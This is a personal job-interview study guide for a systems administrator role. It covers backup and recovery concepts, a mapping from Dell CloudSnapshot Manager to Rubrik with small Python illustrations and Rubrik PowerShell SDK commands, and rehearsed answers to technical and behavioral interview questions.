RTO (Recovery Time Objective) — how fast must systems be back. Drives method — instant mount vs full restore.
3-2-1 Rule — 3 copies, 2 media types, 1 off-site. Rubrik on-prem + cloud archive = 3-2-1.
GFS (Grandfather-Father-Son): tiered retention, e.g. dailies kept 30 days, weeklies 12 weeks, monthlies 12 months, yearlies N years. A Rubrik SLA Domain enforces this automatically.
Immutable Backup: WORM (write once, read many). Cannot be modified or deleted for a defined period. Critical for ransomware protection. Rubrik stores backups immutably by default; the air gap is a separate control.
Air Gap — backup completely isolated from production network. Rubrik cloud archive in a separate account/tenant = logical air gap.
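GFS retention is easiest to explain as a keep-or-expire decision per recovery point. The sketch below uses the example tiers above with assumed conventions that a real product lets you configure: the weekly copy is the Sunday backup, the monthly copy is the 1st of the month, the yearly copy is January 1, and yearly retention defaults to 7 years.

```python
from datetime import date


def gfs_keep(snapshot: date, today: date, yearly_years: int = 7) -> bool:
    """Decide whether a daily recovery point is still retained under GFS."""
    age = (today - snapshot).days
    if age < 0:
        raise ValueError("snapshot is in the future")
    if age <= 30:                                   # son: every daily, 30 days
        return True
    if snapshot.weekday() == 6 and age <= 12 * 7:   # father: Sundays, 12 weeks
        return True
    if snapshot.day == 1 and age <= 365:            # grandfather: 1st of month, 12 months
        return True
    if snapshot.month == 1 and snapshot.day == 1:   # yearly: January 1 copies
        return age <= yearly_years * 365
    return False
```

Run it over every recovery point each night and delete the ones that return False. That is the job an SLA policy does for you.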

Dell CloudSnapshot Manager — Your Real Experience

✅ This is your Rubrik bridge. Same concepts, different platform.

What You Did with Dell CSM

  • AWS Tagging — tagged EC2 instances and EBS volumes so CSM could identify what to protect. Tags drove which policy applied to which resource. Same concept as Rubrik SLA tag assignment.
  • Backup Policies — configured frequency (hourly/every 4h/daily) and retention (how many snapshots to keep, how long). CSM enforced these automatically without manual job scheduling.
  • Snapshot Lifecycle — CSM created EBS snapshots on schedule and automatically expired old ones per retention settings. Hands-off once configured.
  • Cross-Region Copy — copied snapshots to a secondary AWS region for DR. Same as Rubrik replicating to a secondary cluster or archiving to cloud.
  • Recovery — restored EC2 instances or individual EBS volumes from specific recovery points.
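Tag-driven protection is simple to describe in code: the tag value selects the policy, and anything without a valid tag is unprotected. This is a hypothetical model, not the CSM or AWS API. The tag key `backup-policy`, the policy names, and the settings are all made up for illustration.

```python
# Hypothetical policies: frequency and retention per tier.
POLICIES = {
    "gold":   {"frequency_hours": 1,  "retain_days": 30},
    "silver": {"frequency_hours": 4,  "retain_days": 14},
    "bronze": {"frequency_hours": 24, "retain_days": 7},
}


def policy_for(resource, tag_key="backup-policy"):
    """Return (policy_name, settings) for a resource, or None if it is
    untagged or tagged with an unknown policy."""
    name = resource.get("tags", {}).get(tag_key, "").lower()
    if name in POLICIES:
        return name, POLICIES[name]
    return None


def unprotected(resources, tag_key="backup-policy"):
    """IDs of resources that no policy will pick up."""
    return [r["id"] for r in resources if policy_for(r, tag_key) is None]
```

The `unprotected` report is the part worth mentioning in an interview: a mistyped tag silently drops a server out of backup, so you audit for it.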

Dell CSM → Rubrik Mapping

Dell CloudSnapshot Manager | Rubrik Equivalent
Tag-based policy assignment | SLA Domain assigned to objects (VMs, filesets, DBs)
Backup policy (frequency + retention) | SLA Policy (frequency, retention tiers, archival rules)
EBS Snapshot | Rubrik incremental-forever snapshot (stored in Rubrik cluster)
Cross-region snapshot copy | Rubrik replication to secondary cluster OR cloud archive to Azure/S3
Restore from snapshot | Instant recovery / live mount or full restore from RSC
CSM web UI | Rubrik Security Cloud (RSC), the centralized SaaS console

Rubrik — Complete Platform Deep Dive

Architecture

  • Rubrik Cluster (On-Prem): physical or virtual appliance running Rubrik software. Stores backup data locally. Single or multi-node for scale/HA. Connects to vCenter, AD, NAS, physical agents.
  • Rubrik Security Cloud (RSC): SaaS browser-based management console. Single pane for all Rubrik clusters, cloud workloads, SaaS protection. Create SLA policies, monitor jobs, trigger restores, view threats.
  • SLA Domain (Policy): core object in Rubrik. Defines backup frequency, local retention, replication target, cloud archive tier and retention. Assign to any workload and Rubrik enforces it automatically.
  • Cloud Archive: old backup data tiered to Azure Blob, AWS S3, or GCS per SLA policy. Cheaper long-term retention. Rubrik manages the lifecycle, so you don't touch it manually.

How Rubrik Handles Each Backup Type

Scenario | Backup Type Used | How Rubrik Does It
First ever backup of a workload | Full | Reads all data and ingests to the Rubrik cluster. Foundation of the protection chain.
All subsequent scheduled backups | Incremental-forever | Only changed blocks since last backup transferred. No periodic full needed. Dedup + compression applied at ingest.
Every recovery point appears as a full | Synthetic Full (virtual) | Rubrik constructs a full image on demand from the chain. No source re-read. Every restore point is instantly accessible as if it were a full backup.
Fast recovery: Live Mount | Snapshot (in-place) | Rubrik presents the backup data directly to vCenter as a live datastore. VM boots in seconds. Background restore runs. When done, VM is migrated back transparently. Cuts RTO from hours to minutes.
File-level recovery | Object restore from snapshot | Browse backup contents like a file explorer. Select individual file(s) and restore to original or alternate location. No full VM restore needed.
Long-term archive retrieval | Object restore from cold storage | Rehydrate from Azure Blob Archive or S3 Glacier. May take hours depending on tier. Plan this for DR scenarios, not daily operations.
Ransomware recovery | Immutable snapshot | Backups stored with immutability: even Rubrik admins can't delete them during the retention window. Find last clean recovery point before infection. Instant mount to validate, then restore.
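The incremental-forever and synthetic-full rows can be pictured as a base block map plus a list of deltas. The sketch below is a conceptual model only and makes no claim about Rubrik's internal implementation; blocks are modeled as dictionary entries and the names are illustrative.

```python
def synthetic_full(base, incrementals, point):
    """Build the full block map as of recovery point `point`.

    base          -- dict {block_number: data} from the first full backup
    incrementals  -- list of dicts holding only changed blocks, oldest first
    point         -- 0 means the base; n means after the n-th incremental
    """
    image = dict(base)             # copy, so the stored base stays untouched
    for delta in incrementals[:point]:
        image.update(delta)        # later changes overwrite earlier blocks
    return image
```

Every recovery point is built from data already on the backup system, so the source server is read in full only once. That is why no weekly full backup window is needed.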

Key Rubrik Features

  • Deduplication & Compression: identical blocks across VMs stored once. Compression reduces further. Savings of roughly 40–60% vs raw data are commonly quoted, but the real figure depends on the workload, so don't state it as a guarantee.
  • VMware Integration — uses VMware VADP (vStorage APIs for Data Protection) to take application-consistent quiesced snapshots of VMs without installing agents inside the VM.
  • Physical & Agent-based — for physical servers and databases (SQL, Oracle), Rubrik installs an agent inside the OS. The agent coordinates VSS/quiescing and sends data to the Rubrik cluster.
  • Ransomware Threat Hunting — Rubrik scans backup data for indicators of ransomware and flags suspicious activity. Helps identify which snapshots are clean vs infected.
  • API-First — everything in RSC is accessible via REST API or the Rubrik PowerShell SDK. Automate snapshot triggers, reporting, restores.
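Block-level deduplication is worth being able to explain from first principles. A minimal sketch using fixed-size blocks and SHA-256 digests; the 4-byte block size is only to keep the example readable, and real products use much larger and often variable-size blocks.

```python
import hashlib


def dedup_store(streams, block_size=4):
    """Split each stream into blocks and store every unique block once."""
    store = {}     # digest -> block bytes
    recipes = {}   # stream name -> ordered list of digests
    for name, data in streams.items():
        digests = []
        for i in range(0, len(data), block_size):
            block = data[i:i + block_size]
            digest = hashlib.sha256(block).hexdigest()
            store.setdefault(digest, block)   # keep only the first copy
            digests.append(digest)
        recipes[name] = digests
    return store, recipes


def rebuild(store, recipe):
    """Reassemble a stream from its list of block digests."""
    return b"".join(store[d] for d in recipe)
```

Two VMs built from the same template share most of their blocks, so the second one adds very little to the store. In the test data below, 24 raw bytes across two streams reduce to 16 stored bytes.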

Rubrik PowerShell SDK — Key Commands

# Install and connect
Install-Module Rubrik
Connect-Rubrik -Server rubrik.company.local -Credential (Get-Credential)

# Get VM protection status
Get-RubrikVM -Name "WebServer01"
Get-RubrikVM | Where-Object { $_.effectiveSlaDomainName -eq "Unprotected" }   # find unprotected VMs

# Take on-demand snapshot (retention follows the named SLA)
Get-RubrikVM -Name "WebServer01" | New-RubrikSnapshot -SLA "Gold"

# List recovery points (pipe the VM in; snapshots are looked up by the VM's id)
Get-RubrikVM -Name "WebServer01" | Get-RubrikSnapshot | Select-Object date, cloudState, slaName | Sort-Object date -Descending

# Recover the latest recovery point as a Live Mount
# Cmdlet names vary by module version: confirm with Get-Command -Module Rubrik
$latest = Get-RubrikVM -Name "WebServer01" | Get-RubrikSnapshot | Sort-Object date -Descending | Select-Object -First 1
New-RubrikMount -id $latest.id

# Assign SLA policy
Get-RubrikVM -Name "WebServer01" | Protect-RubrikVM -SLA "Gold"

Interview Q&A — Storage & Backups

Have you worked with Rubrik?
Not with Rubrik directly, but I've worked at the same conceptual level with equivalent tools. I used Dell CloudSnapshot Manager in AWS — tag-based policy assignment, configuring backup frequency and retention, managing snapshot lifecycle and cross-region copies for DR. At CMS I configured Azure Backup with Recovery Services Vaults, tiered retention policies, and recovery testing. At Disney I administered three EMC Isilon NAS clusters. Rubrik is the same domain — policy-driven backup, SLA enforcement, instant recovery, cloud archival. I'd get up to speed on the RSC console and SDK quickly.
How would you design a backup policy for a mixed environment?
Categorize workloads by criticality first. Tier 1 (production, critical databases): backups every 4 hours to meet an RPO of 4 hours or less, 30-day local retention, weeklies retained 3 months, monthlies 1 year. Application-consistent. RTO under an hour using live mount. Tier 2 (important but not mission-critical): daily, 14-day retention. Tier 3 (dev/test): weekly only, 30 days. Layer in cloud archival for anything needing long-term retention at lower cost. And validate recovery: quarterly restore drills to confirm backups are actually usable before an incident makes it urgent. That's the piece people skip and then regret.
What's the difference between a snapshot and a backup?
A snapshot is a point-in-time copy on the same storage system — fast, useful as a safety net before a change, but doesn't protect against storage failure or ransomware that hits the same system. A backup is an independent copy stored separately — designed for disaster recovery, hardware failure, or ransomware. Rubrik bridges this elegantly: it takes a snapshot of a VM, then immediately moves that data to its own protected, immutable storage. You get the speed of a snapshot with the protection of a true backup, stored off the production system.

Tell Me About Yourself — Framework

Tell me about yourself.
I'm a bilingual systems administrator with 10+ years of enterprise IT experience. I spent 8 years at The Walt Disney Company managing multi-site hybrid infrastructure — VMware, Linux servers, storage, networking, and 24/7 media operations across three data centers. From there I went into a federal healthcare IT contract supporting Centers for Medicare and Medicaid Services — CMS — focused on Azure, Active Directory, VMware Horizon VDI, and PowerShell automation. I recently relocated to Houston and I'm looking for a stable operational role where I can contribute from day one. Hybrid infrastructure — cloud and on-prem together — is exactly where I operate.

Situational / Behavioral Questions

Tell me about a time something broke in production and how you handled it.
At Disney we had a VMware host fail during a live broadcast window — multiple VMs hosting our streaming TV stations went down. HA kicked in and restarted most VMs within a few minutes, but two didn't restart cleanly because of resource contention on the remaining hosts. I immediately vMotioned lower-priority VMs to free up capacity, then manually triggered the restarts on the critical broadcast VMs. We were back live within 8 minutes. After stabilizing, I did a root cause analysis — the host had been showing disk latency warnings in vCenter for two days that nobody acted on. From that I pushed for alert thresholds to be wired to an action group so the team would be paged immediately rather than relying on someone checking dashboards.
How do you prioritize when multiple issues come in at once?
Impact and scope first — how many users affected and how critically. Something down for one user is a P3. Something down for a whole department is a P1 regardless of who submitted the ticket. I triage quickly, communicate to affected users so they know it's being worked, and escalate proactively if the issue is beyond my immediate resolution. Documentation happens in parallel — I write notes as I work so if I have to hand off, the next person isn't starting from zero.
Why do you want this role / why Heath Consultants?
I'm looking for a stable operational role in a real infrastructure environment — cloud and on-prem together — where I can do the work without a lot of bureaucracy. Heath's focus on utility and field operations infrastructure is interesting to me — it's practical, mission-critical work. I'm local, I'm available immediately, and I want to plant roots in Houston rather than job-hop. This fits both what I'm good at and what I'm looking for.
What's a technology you taught yourself recently?
I've been building bash and Python scripts for personal automation projects — including a weather monitoring script that watches multiple cities via API and sends Telegram alerts for rain and flood warnings. It's running on a Linux server continuously. I also started studying Security+ — which has pushed me to formalize a lot of the security concepts I've been applying by instinct into proper frameworks. Learning by building something real is how I retain it best.
This is genuine — your rain_alert.sh is a real project. Own it.

Questions to Ask Them

Pick 2–3. Show curiosity, not neediness.

  • What does the current IT infrastructure look like — ratio of cloud to on-prem?
  • Is this a solo IT role or part of a team? Who would I work most closely with day to day?
  • What's the biggest infrastructure challenge you'd want this person to help solve in the first 90 days?
  • What does success look like at 6 months?
  • What's the on-call or after-hours expectation, if any?
  • How is the IT team structured — are there separate teams for cloud, infrastructure, helpdesk?
  • What tools are you currently using for monitoring and backup? (Opens Rubrik conversation naturally.)
Optional power close: "Is there anything about my background that gives you pause? I'd rather address it directly." — Bold. Memorable. Shows confidence.

Interview Tone Reminders

  • 3–5 sentences per answer, then stop. Let them probe. Don't fill silence with rambling.
  • Gaps (JAMF, Rubrik, Intune, deep M365): bridge honestly, move on. No apologizing.
  • ~1yr Azure/VMware gap: "I've been refreshing the details — the hands-on foundation is there." Then answer the question.
  • Smile. Video calls are cold. Warmth is memorable.
  • Pause before answering complex questions. "Let me think about that for a second" is a sign of a professional, not weakness.
  • Bilingual is a bonus. Utility industry often has bilingual field crews — mention it if there's an opening.